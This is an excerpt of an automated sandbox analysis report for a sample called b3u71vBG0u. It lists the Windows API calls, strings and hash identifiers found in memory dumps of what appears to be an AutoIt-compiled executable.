                    • Instruction Fuzzy Hash: BDE01A712402149FC710AF69D844ADAB7E8AF94760F00802AF949D7352DA78A8408BA0
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007A4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 2987744be289acb8d0d37a2a180419dc074db3be1d53292170673c7e1a32d7a8
                    • Instruction ID: 239489e6d21ae195304163f82e3f0ba994c06e0975944492b55719c90d1bc188
                    • Opcode Fuzzy Hash: 2987744be289acb8d0d37a2a180419dc074db3be1d53292170673c7e1a32d7a8
                    • Instruction Fuzzy Hash: 14D05EB01A82057CFC184B24BC0FF760219E3C2781F8C6B897301854C1A9EF6810A034
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007988D1), ref: 00798CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
                    • Instruction ID: e2be0ad7fb59c89ef222d8d3311767c868aa6837693dbdf2b5da42aad3d75db4
                    • Opcode Fuzzy Hash: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
                    • Instruction Fuzzy Hash: 48D05E3226090EABEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A1C775D835AB60
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00782242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a8edc0b613333c3a932d822b0bd87fd3e56164c23c41738b630274c091cbd3df
                    • Instruction ID: cbc941294e484c01850ff7ec752420d1570b35e7fa40f24ef55944a3037ddbc0
                    • Opcode Fuzzy Hash: a8edc0b613333c3a932d822b0bd87fd3e56164c23c41738b630274c091cbd3df
                    • Instruction Fuzzy Hash: 23C04CF1801109DBDB05DB90D988DFE77BDAB04304F104066E102F2100D7789B448B71
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0076A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
                    • Instruction ID: 9f88c066652b19e7cd74d727de051b5f95aaf155ca7fc1d7ab21dcda763b6cd7
                    • Opcode Fuzzy Hash: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
                    • Instruction Fuzzy Hash: 6AA0113000020CBB8A002B82EC08888BFAEEA802A0B008020F80C800228B32AA208A88
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 353e30c706b744169c7195b447a1a9df8c431ce94646a5e248ffa0f17e790035
                    • Instruction ID: 89ac0b11bbdcac4f8f596c90480acb901e6df826864b4ff013bd605461c8a518
                    • Opcode Fuzzy Hash: 353e30c706b744169c7195b447a1a9df8c431ce94646a5e248ffa0f17e790035
                    • Instruction Fuzzy Hash: 88227B30501625CBDF69CF18D4846FD77A1FB41305F2484AADC52AB291EBBC9D89CB72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 0b9d7878ca994be2eb05eb955308540c284d3de94be77ded40101ef9a76945ee
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 07C1A23220649309DB6D4639D43407FBAE15BA27B135E0B5DECB3CB5C6EF28D525EA20
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: e4a9875a3ce404c53b4dd954e51a2b0ee46eb2818a38733d0aa7e10e93977a38
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 1EC1C43220659309DB6D463A843407FBBE15BA27B135E0B6DECB3DB4C5EF28D525E620
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007B7B70
                    • DeleteObject.GDI32(00000000), ref: 007B7B82
                    • DestroyWindow.USER32 ref: 007B7B90
                    • GetDesktopWindow.USER32 ref: 007B7BAA
                    • GetWindowRect.USER32(00000000), ref: 007B7BB1
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007B7CF2
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007B7D02
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7D4A
                    • GetClientRect.USER32(00000000,?), ref: 007B7D56
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007B7D90
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DB2
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DC5
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DD0
                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DD9
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DE8
                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DF1
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DF8
                    • GlobalFree.KERNEL32(00000000), ref: 007B7E03
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7E15
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007D2CAC,00000000), ref: 007B7E2B
                    • GlobalFree.KERNEL32(00000000), ref: 007B7E3B
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007B7E61
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007B7E80
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7EA2
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B808F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: a8c036d92e496f8ae08aaa30baf464e7fdb716ec401d345ceaffe0fca23faa44
                    • Instruction ID: 48a40eb7d8ec8c51be7820e196f0ffdf710f4a3478a0510e123c3b312b0c49db
                    • Opcode Fuzzy Hash: a8c036d92e496f8ae08aaa30baf464e7fdb716ec401d345ceaffe0fca23faa44
                    • Instruction Fuzzy Hash: C1026B71900119EFDB14DFA4CC89EAE7BB9FB89310F14815DF905AB2A1DB78AD01CB64
                    APIs
                    • CharUpperBuffW.USER32(?,?,007CF910), ref: 007C38AF
                    • IsWindowVisible.USER32(?), ref: 007C38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: 9b7ba9dd61c1c81088711cc63ed30c2775f87ad098cdecf9ab76bfdabf3f516d
                    • Instruction ID: e9a7300bc3e645b88299c8c130ac06e5ff38532234f7cbb9e2c95c7d0dd815fb
                    • Opcode Fuzzy Hash: 9b7ba9dd61c1c81088711cc63ed30c2775f87ad098cdecf9ab76bfdabf3f516d
                    • Instruction Fuzzy Hash: E6D14C70204305DBCB14EF24C459F6E77A5AF94344F10856CB9866B3A2DB3DEE0ACB92
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 007CA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 007CA8D0
                    • GetSysColor.USER32(0000000F), ref: 007CA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 007CA8F6
                    • SelectObject.GDI32(?,?), ref: 007CA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007CA930
                    • GetSysColor.USER32(00000010), ref: 007CA938
                    • CreateSolidBrush.GDI32(00000000), ref: 007CA93F
                    • FrameRect.USER32(?,?,00000000), ref: 007CA94E
                    • DeleteObject.GDI32(00000000), ref: 007CA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 007CA9A0
                    • FillRect.USER32(?,?,?), ref: 007CA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 007CA9FD
                      • Part of subcall function 007CAB60: GetSysColor.USER32(00000012), ref: 007CAB99
                      • Part of subcall function 007CAB60: SetTextColor.GDI32(?,?), ref: 007CAB9D
                      • Part of subcall function 007CAB60: GetSysColorBrush.USER32(0000000F), ref: 007CABB3
                      • Part of subcall function 007CAB60: GetSysColor.USER32(0000000F), ref: 007CABBE
                      • Part of subcall function 007CAB60: GetSysColor.USER32(00000011), ref: 007CABDB
                      • Part of subcall function 007CAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CABE9
                      • Part of subcall function 007CAB60: SelectObject.GDI32(?,00000000), ref: 007CABFA
                      • Part of subcall function 007CAB60: SetBkColor.GDI32(?,00000000), ref: 007CAC03
                      • Part of subcall function 007CAB60: SelectObject.GDI32(?,?), ref: 007CAC10
                      • Part of subcall function 007CAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007CAC2F
                      • Part of subcall function 007CAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CAC46
                      • Part of subcall function 007CAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007CAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 6dc32ebeac228f983e6687d1bc541dc93c33e29c19353821bedcc4a78e4a6514
                    • Instruction ID: 487becc615bbb2adcbc5dd4a522536d65745c28274cadc5cc6230f48d223bdba
                    • Opcode Fuzzy Hash: 6dc32ebeac228f983e6687d1bc541dc93c33e29c19353821bedcc4a78e4a6514
                    • Instruction Fuzzy Hash: 32A17C72008305FFD7119F64DC08E6B7BAAFB88325F148A2DFA62D61A0D739D944CB56
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00742CA2
                    • DeleteObject.GDI32(00000000), ref: 00742CE8
                    • DeleteObject.GDI32(00000000), ref: 00742CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00742CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00742D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0077C68B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0077C6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0077CAED
                      • Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A
                    • SendMessageW.USER32(?,00001053), ref: 0077CB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0077CB41
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0077CB57
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0077CB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: cc4b8b05e5cf9b86d3778d2e64d2e524d699974e976eb9e8ba279b4e96c71609
                    • Instruction ID: 28b3f3d729c9a81ab275638ec5bfa70ce75e91c71475ff80dcd33e544f0d8cde
                    • Opcode Fuzzy Hash: cc4b8b05e5cf9b86d3778d2e64d2e524d699974e976eb9e8ba279b4e96c71609
                    • Instruction Fuzzy Hash: 98128E30604201EFDB16CF24C888BA9B7E5BF48350F54856DF559DB262CB39E852CFA1
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 007B77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007B78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007B78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007B7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007B7946
                    • GetClientRect.USER32(00000000,?), ref: 007B7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007B7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007B79A5
                    • GetStockObject.GDI32(00000011), ref: 007B79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 007B79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007B79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B79D2
                    • DeleteDC.GDI32(00000000), ref: 007B79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007B7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 007B7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007B7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007B7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 007B7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007B7AAE
                    • GetStockObject.GDI32(00000011), ref: 007B7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007B7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007B7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 619147896f449240cd799d2b0a07025d1684e953904abd38309a4a6ed42bd7ac
                    • Instruction ID: 3c7e82e053e2f1ab01454fc6d447820f597e44ac2dd7dbef72464af6601ad273
                    • Opcode Fuzzy Hash: 619147896f449240cd799d2b0a07025d1684e953904abd38309a4a6ed42bd7ac
                    • Instruction Fuzzy Hash: F2A152B1A40219BFEB14DB64DC4AFAF7BB9EB45710F108118FA15A72E0D778AD10CB64
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007AAF89
                    • GetDriveTypeW.KERNEL32(?,007CFAC0,?,\\.\,007CF910), ref: 007AB066
                    • SetErrorMode.KERNEL32(00000000,007CFAC0,?,\\.\,007CF910), ref: 007AB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 1f9c375eeb437d7b21bc2120a4e8eb564869be6b1496b3d2fa264f8378cbac9a
                    • Instruction ID: 788b5c029b8a72ca03584d728779b1b6131ee5d40c1be3863f1d3cc6e31166d2
                    • Opcode Fuzzy Hash: 1f9c375eeb437d7b21bc2120a4e8eb564869be6b1496b3d2fa264f8378cbac9a
